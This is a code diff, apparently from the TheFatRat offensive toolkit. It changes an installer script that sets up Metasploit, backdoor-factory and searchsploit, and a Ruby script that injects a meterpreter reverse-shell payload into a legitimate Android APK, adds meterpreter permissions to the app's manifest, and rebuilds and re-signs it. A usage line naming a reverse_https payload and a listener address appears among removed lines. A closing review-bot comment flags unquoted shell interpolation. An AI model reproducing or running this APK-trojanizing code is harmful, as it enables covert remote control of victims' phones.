echo "[ ! ] Installing dedepndencies for ruby script from Kali repositories "
xterm -T "☣ INSTALL DEPENDENCIES ☣" -geometry 100x30 -e "sudo apt-get install zlib1g-dev libmagickwand-dev imagemagick -y"
echo "[ ✔ ] Done installing ...."
sleep 2
# check if metasploit-framework its installed
which msfconsole > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Metasploit-Framework..............[ found ]"
# msf was detected , removing config file in case setup was already configured before
rm -f config.path
rm -f $config
#Creating new config file based on last detection of msf
touch config.path
echo "********************************************************************************************************" >> config.path
echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> config.path
echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> config.path
echo "********************************************************************************************************" >> config.path
echo "msfconsole" >> config.path
echo "msfvenom" >> config.path
touch $config
echo "********************************************************************************************************" >> $config
echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> $config
echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> $config
echo "********************************************************************************************************" >> $config
echo "msfconsole" | tee -a $config $log > /dev/null 2>&1
echo "msfvenom" | tee -a $config $log > /dev/null 2>&1
sleep 2
else
echo ""
echo "[ X ] metasploit-framework -> not found ]"
echo "[ X ] metasploit-framework -> not found "
# Providing manual input to user in case metasploit was installed from git and is not on system path
echo ""
@ -237,39 +370,39 @@ read -p "Press Y/y to config metasploit-framework path or N/n to install it from
case "$choice" in
y|Y)
rm -f config.path
touch config.path
echo "********************************************************************************************************" >> config.path
echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> config.path
echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> config.path
echo "********************************************************************************************************" >> config.path
rm -f $config
touch $config
echo "********************************************************************************************************" >> $config
echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> $config
echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> $config
echo "********************************************************************************************************" >> $config
clear
echo "Enter the path of your Metasploit Instalation or just press enter for default config ."
echo -e $white "Ex:(/opt/metasploit-framework)";
read -p "Path:" msfc
echo -e $white "Enter the path of your Metasploit Instalation or just press enter for default config :
ex:(/opt/metasploit-framework)";
read -p "Path: " msfc
if [[ -z "$msfc" ]]; then
echo "msfconsole" >> config.path
echo "msfvenom" >> config.path
echo "msfconsole" | tee -a $config $log > /dev/null 2>&1
echo "msfvenom" | tee -a $config $log > /dev/null 2>&1
else
echo "ruby $msfc/msfconsole" >> config.path
echo "ruby $msfc/msfvenom" >> config.path
echo "ruby $msfc/msfconsole" | tee -a $config $log > /dev/null 2>&1
echo "ruby $msfc/msfvenom" | tee -a $config $log > /dev/null 2>&1
fi
;;
n|N)
echo "[ ! ] Installing metasploit-framework from kali repositories ]"
echo "[ ! ] Installing metasploit-framework from kali repositories "
xterm -T "☣ INSTALL METASPLOIT-FRAMEWORK ☣" -geometry 100x30 -e "sudo apt-get install metasploit-framework --force-yes -y"
echo "[ ✔ ] Done installing ...."
rm -f config.path
touch config.path
echo "********************************************************************************************************" >> config.path
echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> config.path
echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> config.path
echo "********************************************************************************************************" >> config.path
rm -f $config
touch $config
echo "********************************************************************************************************" >> $config
echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> $config
echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> $config
echo "********************************************************************************************************" >> $config
# adding the msf startups automatically to config file
echo "msfconsole" >> config.path
echo "msfvenom" >> config.path
echo "msfconsole" | tee -a $config $log > /dev/null 2>&1
echo "msfvenom" | tee -a $config $log > /dev/null 2>&1
;;
*)
@ -282,25 +415,24 @@ fi
which backdoor-factory > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Backdoor-Factory..................[ found ]"
echo "backdoor-factory" >> config.path
echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1
sleep 2
else
echo "[ X ] backdoor-factory -> not found ]"
echo "[ X ] backdoor-factory -> not found "
echo ""
echo -e $white "[This script requires backdoor-factory
, do you want to setup its path manually ?]";
echo -e $white "[This script requires backdoor-factory , do you want to setup its path manually ?]";
read -p "[Press Y/y to setup backdoor-factory path or N/n to install it from Kali repositories . ]" choice1
case "$choice1" in
y|Y )
clear
echo -e $white "Enter the path for backdoor.py ex:(/opt/backdoor-factory/backdoor.py)
, or just press [ENTER] for default config : ";
read -p "Path:" backdoor
echo -e $white "Enter the path for backdoor.py , or just press [ENTER] for default config :
ex:(/opt/backdoor-factory/backdoor.py)";
read -p "Path: " backdoor
if [[ -z "$backdoor" ]]; then
echo "backdoor-factory" >> config.path
echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1
else
echo "python2 $backdoor" >> config.path
echo "python2 $backdoor" | tee -a $config $log > /dev/null 2>&1
fi
;;
@ -308,7 +440,7 @@ fi
echo "[ ! ] Installing backdoor-factory from kali repositories ]"
xterm -T "☣ INSTALL BACKDOOR-FACTORY ☣" -geometry 100x30 -e "sudo apt-get install backdoor-factory --force-yes -y"
echo "[ ✔ ] Done installing ...."
echo "backdoor-factory" >> config.path
echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1
;;
*)
@ -316,13 +448,12 @@ echo "Invalid Input (Choose y/Y or n/N only)"
;;
esac;
fi
sleep 2
# check if searchsploit exists
which searchsploit > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Searchsploit......................[ found ]"
echo "searchsploit" >> config.path
echo "searchsploit" | tee -a $config $log > /dev/null 2>&1
sleep 2
else
echo "[ X ] searchsploit -> not found]"
@ -333,13 +464,13 @@ case "$choice2" in
y|Y )
clear
echo -e $yellow "Enter the path for searchsploit ex:(/opt/searchsploit/searchsploit)
, or just press [ENTER] for default config : "
echo -e $white "Enter the path for searchsploit , or just press [ENTER] for default config :
ex:(/opt/searchsploit/searchsploit) "
read -p "Path: " searchsploit
if [[ -z "$searchsploit" ]]; then
echo "searchsploit" >> config.path
echo "searchsploit" | tee -a $config $log > /dev/null 2>&1
else
echo "bash $searchsploit" >> config.path
echo "bash $searchsploit" | tee -a $config $log > /dev/null 2>&1
fi
;;
@ -347,7 +478,7 @@ n|N )
echo "[ ! ] Installing searchsploit from kali repositories ]"
xterm -T "☣ INSTALL SEARCHSPLOIT ☣" -geometry 100x30 -e "sudo apt-get install exploitdb --force-yes -y"
echo "[ ✔ ] Done installing ...."
echo "searchsploit" >> config.path
echo "searchsploit" | tee -a $config $log > /dev/null 2>&1
sleep 2
echo ""
echo "Configuration and tool installed with success!";
@ -383,7 +514,7 @@ rm -f /usr/local/sbin/fatrat
touch /usr/local/sbin/fatrat
echo "#!/bin/bash" > /usr/local/sbin/fatrat
echo $scrp >> /usr/local/sbin/fatrat
chmod +x /usr/local/sbin/fatrat
chmod +x /usr/local/sbin/fatrat
clear
echo "";
echo "[ ]====================================================================[ ]";
@ -391,6 +522,7 @@ echo "";
echo "[ ]====================================================================[ ]";
echo "";
chmod +x fatrat
which fatrat >> $log 2>&1
sleep 2
;;


@ -89,8 +89,8 @@ def fix_manifest()
}
original_permissions=[]
apk_mani=''
#Load original apk's permissions
#Load original apk's permissions
File.open("output/original/AndroidManifest.xml","r"){|file2|
k=File.read(file2)
apk_mani=k
@ -152,29 +152,6 @@ unless(apk_v.split()[1].include?("v2."))
exit(1)
end
begin
msfvenom_opts = ARGV[1,ARGV.length]
opts=""
msfvenom_opts.each{|x|
opts+=x
opts+=" "
}
rescue
puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443"
puts "[-] Error parsing msfvenom options. Exiting.\n"
exit(1)
end
print "[*] Generating msfvenom payload..\n"
res=`msfvenom -f raw #{opts} -o output/payload.apk `
if res.downcase.include?("invalid" || "error")
puts res
exit(1)
end
print "[*] Signing payload..\n"
`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA 'output/payload.apk' androiddebugkey`
@ -183,7 +160,7 @@ print "[*] Signing payload..\n"
`cp #{apkfile} output/original.apk`
print "[*] Decompiling orignal APK..\n"
print "[*] Decompiling original APK..\n"
`apktool d output/original.apk -o output/original`
print "[*] Decompiling payload APK..\n"
`apktool d output/payload.apk -o output/payload`
@ -226,7 +203,7 @@ print "[*] Poisoning the manifest with meterpreter permissions..\n"
fix_manifest()
print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n"
`apktool b -o output/#{injected_apk} output/original`
`apktool b -o #{injected_apk} output/original`
print "[*] Signing #{injected_apk} ..\n"
`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey`
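Review bot: The rewritten rebuild step `apktool b -o #{injected_apk} output/original` interpolates `injected_apk` unquoted into a backtick shell command, so a file name containing spaces or shell metacharacters is parsed by the shell instead of being passed as a single argument. `injected_apk` is assigned outside the visible hunks, so whether it can carry text from the command-line APK path is an assumption to confirm. If it can, the argument-list form keeps the shell out of it: `system("apktool", "b", "-o", injected_apk, "output/original") or abort("[-] apktool build failed")`. Backticks also discard the exit status, so a failed rebuild currently falls through to the jarsigner line that follows. The script body starts and ends outside this hunk.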